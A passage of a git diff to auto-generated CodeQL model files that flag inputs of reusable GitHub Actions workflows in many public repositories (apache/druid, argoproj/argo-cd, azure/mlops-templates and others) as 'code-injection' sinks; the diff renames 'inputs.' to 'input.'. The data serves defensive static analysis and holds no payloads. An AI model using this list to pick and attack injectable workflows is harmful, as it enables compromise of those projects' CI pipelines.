"inputs.version_name", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "input.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index a14d41a15b9..f8c4e3c68be 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"] \ No newline at end of file + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "input.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "input.dist-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 0888318ad93..793136cc3d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"] - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"] - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"] \ No newline at end of file + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index 6ea6dcdab70..e46601a7bff 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] - - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 2c18a166cc1..558ff908edf 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] - - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index f065947dbdc..a477e289d9e 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"] \ No newline at end of file + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index 438525e77e2..a72ace81445 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index ca3111ad03a..26c0794a19c 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 1e09e05e8b6..5ad39d5e184 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index ad061ca714d..3c790f81d74 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 3a721a0f2cf..50fdcfd5a2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index bdabbb9ab60..6363564503c 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 6d8438462a8..fce736676fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 6d7bf7af0c2..593322a739e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3b198fbf65..b3984a7ab83 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 9c3ae9bf194..a6f1bd4569d 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 68a85006c6c..b661a1fa26a 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index ee336ee076c..0f58971041d 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 3d3f727923a..f12a337d71d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index f18d1e4c50a..76796b4ae38 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 21db2585a5e..8cc08edff5d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 3f263608c21..c2963eb76f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 017d0bc89f5..66aea90b41a 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 1a38d6b35ad..49ed7bca899 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 339d7b1dd0a..fd0a2d9110a 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index ff0f83454c2..1a3bdd1b380 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", 